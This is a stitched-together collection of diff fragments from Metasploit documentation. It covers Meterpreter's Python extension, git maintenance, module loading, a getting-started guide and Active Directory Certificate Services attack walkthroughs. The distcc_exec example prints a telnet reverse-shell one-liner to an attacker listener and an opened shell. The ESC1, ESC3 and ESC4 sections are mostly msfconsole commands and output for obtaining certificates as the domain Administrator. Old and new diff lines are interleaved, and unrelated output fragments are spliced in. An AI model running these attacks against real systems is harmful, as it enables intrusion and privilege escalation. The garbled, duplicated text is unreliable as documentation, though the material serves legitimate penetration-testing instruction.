For example to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute `portfwd add -R -l 4444 -L 172.20.97.73 -p 9093` as shown below, which would then cause the machine who have a session on to start listening on port 9093 for incoming connections.
@@ -11,12 +11,12 @@ Unfortunately, at this point in time the extension only works inside x86 and x64
# Usage
As with any other extension that comes with Meterpreter, loading it is very simple:
```
```msf
meterpreter > use python
Loading extension python...success.
```
Once loaded, the help system shows the commands that come with the extension:
```
```msf
meterpreter > help
... snip ...
@@ -36,7 +36,7 @@ Each of these commands is discussed in detail below.
## python_execute
The `python_execute` command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the `-c` switch. The full help for the command is as follows:
```
```msf
meterpreter > python_execute -h
Usage: python_execute <python code> [-r result var name]
@@ -50,13 +50,13 @@ OPTIONS:
-r <opt> Name of the variable containing the result (optional)
```
A very simple example of this command is shown below:
```
```msf
meterpreter > python_execute "print 'Hi, from Meterpreter!'"
[+] Content written to stdout:
Hi, from Meterpreter!
```
Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it's visible to the user. This also happens for anything written to stderr, as shown below:
```
```msf
meterpreter > python_execute "x = x + 1"
[-] Content written to stderr:
Traceback (most recent call last):
@@ -66,25 +66,25 @@ NameError: name 'x' is not defined
This handy feature now only allows users to see the output of their scripts, but it also means that any errors are completely visible too.
A more interesting example can be seen below:
```
```msf
meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]"
[+] Command executed without returning a result
```
The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured.
The good thing is that the Python extension is persistant across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
```
The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
```msf
meterpreter > python_execute "print x"
[+] Content written to stdout:
[0, 5, 10, 15]
```
As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` paramter, as described by the help:
```
As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` parameter, as described by the help:
```msf
meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]" -r x
[+] x = [0, 5, 10, 15]
```
Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the `-r` parameter:
```
```msf
meterpreter > python_execute "" -r x
[+] x = [0, 5, 10, 15]
```
@@ -95,7 +95,7 @@ Sometimes, single-line execution isn't enough, or is cumbersome. The `python_imp
## python_import
This command allows for whole modules to be loaded from the attacker's machine an uploaded to the target interpreter. The full help is shown below:
```
```msf
meterpreter > python_import -h
Usage: python_import <-f file path> [-n mod name] [-r result var name]
@@ -114,8 +114,8 @@ OPTIONS:
Importing of module trees is still considered a _beta_ feature, but we encourage you to use it where possible and keep us informed of any issues you may face.
Consider the following script:
```
$ cat /tmp/drives.py
```python
# $ cat /tmp/drives.py
import string
from ctypes import windll
@@ -133,7 +133,7 @@ result = get_drives()
print result
```
The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows:
```
```msf
meterpreter > python_import -f /tmp/drives.py
[*] Importing /tmp/drives.py ...
[+] Content written to stdout:
@@ -146,7 +146,7 @@ This command is also intended to allow for recursive loading of modules from the
## python_reset
It may get to a point where the content of the interpreter needs to be flushed. The `python_reset` command clears out all imports, libraries and global variables:
```
```msf
meterpreter > python_execute "x = 100"
[+] Command executed without returning a result
meterpreter > python_execute "print x"
@@ -244,7 +244,7 @@ It is not possible to delete transports using the python extension as this opens
@@ -8,18 +8,18 @@ Clone a new metasploit-framework.git repository:
Go there and check out every remote branch we've got. That way, if you screw up and delete something important, you can add it back in later from this backup clone.
````
```
todb@presto:~/github/todb-r7$ cd msf-backup.git
`todb@presto:~/github/todb-r7/metasploit-framework$ for b in `git branch -r | grep -v "HEAD -> origin" | sed 's/^ origin\///'`; do git checkout -b $b --track origin/$b; done
````
```
Tarball it out of the way.
````
```
todb@presto:~/github/todb-r7$ cd ..
todb@presto:~/github$ tar zxvf msf-backup.git.tar.gz
todb@presto:~/github$ rm -rf msf-backup.git
````
```
# Make a new clone
@@ -35,10 +35,10 @@ First, wipe out anything that responds to prune. Usually that's not a lot.
Next, take a look at what's already merged and what's not. We can drop most of the merged stuff right away.
````
```
mazikeen:./msf-prune$ git branch -r --merged
mazikeen:./msf-prune$ git branch -r --no-merged
````
```
That gives a pretty good idea of how many branches we're talking about.
@@ -46,21 +46,21 @@ That gives a pretty good idea of how many branches we're talking about.
Here's a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote **merged** branches in date order.
````
```
mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort
````
```
Count off how many you want to keep at the end, do the arithmetic, and tack on another couple pipes to catch everything that's more than two weeks old. These are the merged branches that nobody's likely to miss.
`````
```
mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort | head -45 | sed "s/^.*origin\///" > /tmp/merged_to_delete.txt
````
```
Pull the trigger:
````
```
mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b && git push origin :$b; done
````
```
Note that we still have our tarball, so if we need to reinstate any of these branches, just need to re-push.
@@ -31,14 +31,14 @@ You can inspect exactly what commits are contained in this merge with the follow
Like so:
````
```
$ git log bad-merge...bad-merge~ --oneline
3996557 Fix conflcit lib/msf/util/exe.rb
6296c4f Merge pull request #9 from tabassassin/retab/pr/2320
d0a3ea6 Retab changes for PR #2320
bff7d0e Merge for retab
4c9e6a8 Default to exe-small
````
```
The syntax is a little wacky, but this is saying, "Show me all the commit hashes that occur from the `bad-merge` point to one back from `bad-merge` (in other words, from right before `bad-merge` was merged). That's what the tilde (~) means. You could also use `bad-merge^` or `bad-merge^1`, they're all equivalent.
@@ -4,9 +4,9 @@ If you're in the business of writing or collecting Metasploit modules that aren'
You must first set up a directory structure that fits with Metasploit's expectations of path names. What this typically means is that you should first create an "exploits" directory structure, like so:
````bash
```bash
mkdir -p $HOME/.msf4/modules/exploits
````
```
If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll want to `mkdir` those as well.
@@ -14,9 +14,9 @@ If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll
Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use `test` or `private`, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example:
... if you are developing a file format exploit for Windows.
@@ -36,7 +36,7 @@ For full details:
If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:
@@ -4,7 +4,7 @@ Recent changes to HTTP and HTTPS communications in both Meterpreter and its stag
The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and [WinHTTP][]. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important.
The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
[WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.
@@ -22,7 +22,7 @@ As indicated in a [blog post on MSDN][msdn_winhttp]:
What this means is that from Windows 7 and onwards, the underlying [WinHTTP][] implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires `Keep-Alive` support, such as NTLM authentication, then [WinHTTP][] will refuse to talk to it. Instead of downgrading, it will expect a purely RFC-compliant implementation, and instead will return a `407` error the client. This means that for Meterpreter to work, [WinHTTP][] can't be used.
In order to avoid this issue, [extra work][wininet_fallback] has beeen done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
In order to avoid this issue, [extra work][wininet_fallback] has been done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
To sum up, Meterpreter will use [WinHTTP][] where it can. If it can't, it'll fall back to [WinInet][] _unless_ paranoid mode is enabled.
@@ -27,7 +27,7 @@ If someone has library changes that cannot be merged to master, we cannot hang o
## Rescuing unstable modules
If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similiar `git checkout` to grab the file and then `git mv` it to the right spot again.
If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar `git checkout` to grab the file and then `git mv` it to the right spot again.
Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:
Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the `msfconsole` command to open Metasploit:
Metasploit is based around the concept of [[modules]]. The most commonly used module types are:
- Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
- Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
- Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
- Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.
You can use the `search` command to search for modules:
```msf
msf6 > search type:auxiliary http html title tag
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/title normal No HTTP HTML Title Tag Content Grabber
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title
msf6 >
```
You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
active module:
```msf
msf6 > use auxiliary/scanner/http/title
msf6 auxiliary(scanner/http/title) >
```
### Running Auxiliary modules
Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module
extracting the HTTP title from a server:
```msf
msf6 > use auxiliary/scanner/http/title
msf6 auxiliary(scanner/http/title) >
```
Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
```msf
msf6 auxiliary(scanner/http/title) > show options
Module options (auxiliary/scanner/http/title):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SHOW_TITLES true yes Show the titles on the console as they are grabbed
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_NOTES true yes Store the captured information in notes. Use "notes -t http.title" to view
TARGETURI / yes The base path
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/title) >
```
To set a module option, use the `set command`. We will set the `RHOST` option - which represents the target host(s) that
the module will run against:
```msf
msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
RHOSTS => google.com
```
The `run` command will run the module against the target, showing the target's HTTP title:
```msf
msf6 auxiliary(scanner/http/title) > run
[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
New in Metasploit 6 there is added support for running modules with options set as part of the run command. For instance, setting
both `RHOSTS` and enabling `HttpTrace` functionality:
```msf
msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true
####################
# Request:
####################
GET / HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:
```msf
msf6 > use unix/misc/distcc_exec
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) >
```
Exploit modules will generally at a minimum require the following options to be set:
- `RHOST` - The remote target host address
- `LHOST` - The listen address. **Important** This may need to be set to your `tun0` IP address or similar, if you are connecting to your target over a VPN
- `PAYLOAD` - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration
Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
```msf
msf6 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/misc/distcc_exec) >
```
For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):
```msf
msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
rhost => 192.168.123.133
msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
```
The `run` command will run the module against the target, there is also an aliased `exploit` command which will perform the same action:
```msf
msf6 exploit(unix/misc/distcc_exec) > run
[+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BmpMGFX6NDVlh5h0;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BmpMGFX6NDVlh5h0\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100
whoami
daemon
```
New in Metasploit 6 there is added support for running modules with options set as part of the run command:
```msf
msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
[+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo QqL1Uzom6eBFilyL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "QqL1Uzom6eBFilyL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100
From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However, whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate tempalte. At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that useful for us.
From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However,
whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions
prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate template.
At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that
useful for us.
Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their privileges.
Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on
the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-
BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means
that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their
privileges.
Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack. ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but vulnerable to ESC3_TEMPLATE_2 attacks.
Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack.
ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but
vulnerable to ESC3_TEMPLATE_2 attacks.
We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.
We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from
Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory
that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.
Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and who's issuing CA allows any authenticated user to request it.
Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and
who's issuing CA allows any authenticated user to request it.
With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the`ipcr_cert` module to request certificates for authentication using the vulnerable certificate templates.
With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the
`ipcr_cert` module to request certificates for authentication using the vulnerable certificate templates.
## Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can. Luckly we can also do this with the `icpr_cert` module. We just need to also set the `ALT_UPN` option to specify who we would like to authenticate as instead. Note that this only works with ESC1 vulnerable certificate templates which is why we can do this here.
# Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can.
Luckily we can also do this with the `icpr_cert` module. We just need to also set the `ALT_SID` and `ALT_UPN` options to
specify who we would like to authenticate as instead. Note that this only works with certificate templates that are
vulnerable to ESC1 due to having the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag set.
If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can quickly set this up:
If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can
quickly set this up:
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
@@ -327,10 +352,12 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
SMBDomain => DAFOREST
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
SMBPass => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
SMBUser => normal
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
SMBDomain DAFOREST no The Windows domain to use for authentication
SMBPass normaluser no The password for the specified username
SMBUser normal no The username to authenticate as
SMBPass normalpass no The password for the specified username
SMBUser normaluser no The username to authenticate as
Auxiliary action:
@@ -521,18 +549,27 @@ We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket grant
domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
# Exploiting ESC3 To Gain Domain Administrator Privileges
To exploit ESC3 vulnerable templates we will use a similar process to ESC2 templates but with slightly different steps. First, lets return to the earlier output where we can find several templates that are vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other principals (such as users or computers).
To exploit ESC3 vulnerable templates we will use a similar process to
[[ESC2|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc2-to-gain-domain-administrator-privileges]] templates but
with slightly different steps. First, let's return to the earlier output where we can find several templates that are
vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this
attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has
the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other
principals (such as users or computers).
The second part of this attack will then require that we co-sign requests for another certificate using the certificate that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being vulnerable to the ESC3_TEMPLATE_2 attack.
The second part of this attack will then require that we co-sign requests for another certificate using the certificate
that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do
this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being
vulnerable to the ESC3_TEMPLATE_2 attack.
The list of ESC3_TEMPLATE_1 vulnerable templates is pretty short and consists of a single template:
- ESC3-TEMPLATE-1 - Vulnerable to ESC3_TEMPLATE_1 and allows enrollment via any authenticated domain user.
ESC3_TEMPLATE_2 are more plentiful though and we can find a few that are of interest:
- SubCA - Again as mentioned earlier can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
- SubCA - Again as mentioned earlier can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
- ESC3-Template2 - Enrollable via any authenticated domain user.
- User - Enrollable via any authenticated domain user.
- Administrator - Can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
- Administrator - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
- Machine - No real overlap between Domain Computers and Authenticated Users I don't think?
- DomainController - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
@@ -572,10 +609,10 @@ Auxiliary action:
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
SMBUser => normal
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
SMBPass => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
SMBDomain => DAFOREST
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
@@ -606,7 +643,7 @@ host service type name content info
msf6 auxiliary(admin/dcerpc/icpr_cert) >
```
Next we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:
Next, we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
# Getting A Kerberos Ticket
Once a certificate for a user has been claimed, that certificate can be used to issue a Kerberos ticket granting ticket
(TGT) which in tern can be used to authenticate to services.
# Exploiting ESC4 To Gain Domain Administrator Privileges
To exploit ESC4, we will require an account with write privileges over a certificate template object in Active
Directory. This involves finding an object with weak permissions defined within the `nTSecurityDescriptor` field. With
this object identified, we can modify it to reconfigure the template to be vulnerable to another ESC technique.
Ticket granting tickets can be requested using the [[kerberos/get_ticket|kerberos/get_ticket.md]] module by specifying
the `CERT_FILE` option. Take the certificate file from the last stage of the attack and set it as the `CERT_FILE`.
Certificates from Metasploit do not require a password, but if the certificate was generated from a source that added
one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` datastore option to the Domain Controller, then
run the `GET_TGT` action.
First, we will use the `icpr_cert` module in an attempt to exploit ESC1 (by setting `ALT_UPN`). This fails because
the `ESC4-Test` certificate template does not allow the certificate's subject name to be supplied in the request (the
`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag is not set in the `msPKI-Certificate-Name-Flag` field).
```msf
msf6 > use kerberos/get_ticket
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
CA => daforest-WIN-BR0CCBA815B-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC4-Test
CERT_TEMPLATE => ESC4-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
ALT_UPN => Administrator@daforest.com
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 172.30.239.85
Matching Modules
================
[-] 172.30.239.85:445 - There was an error while requesting the certificate.
[-] 172.30.239.85:445 - Denied by Policy Module
[-] 172.30.239.85:445 - Error details:
[-] 172.30.239.85:445 - Source: (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 172.30.239.85:445 - HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >
```
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/get_ticket normal No Kerberos TGT/TGS Ticket Requester
Next, we use the `ad_cs_cert_template` module to update the `ESC4-Test` certificate template. This process first makes a
backup of the certificate data that can be used later. Next, the local certificate template data is read and used to
update the object in Active Directory. The local certificate template data can be modified to set a custom security
descriptor.
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME normaluser
USERNAME => normaluser
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD normalpass
PASSWORD => normalpass
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
CERT_TEMPLATE => ESC4-Test
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE
ACTION => UPDATE
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 172.30.239.85
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/kerberos/get_ticket
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.30.239.85:389 Getting root DSE
[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
@@ -216,9 +216,9 @@ We're excited to see your upcoming contributions of new modules, documentation,
Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue]. For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].
@@ -14,7 +14,7 @@ The following sites are great references for Git padawans and jedi alike:
* [Git is Easier Than You Think](http://nfarina.com/post/9868516270/git-is-simpler): A nice tutorial that breaks down one Git user's experience switching from Subversion.
* [PeepCode: Git](http://peepcode.com/products/git): A one-hour (not-free) screencast covering Git basics. Well-made and easy to follow.
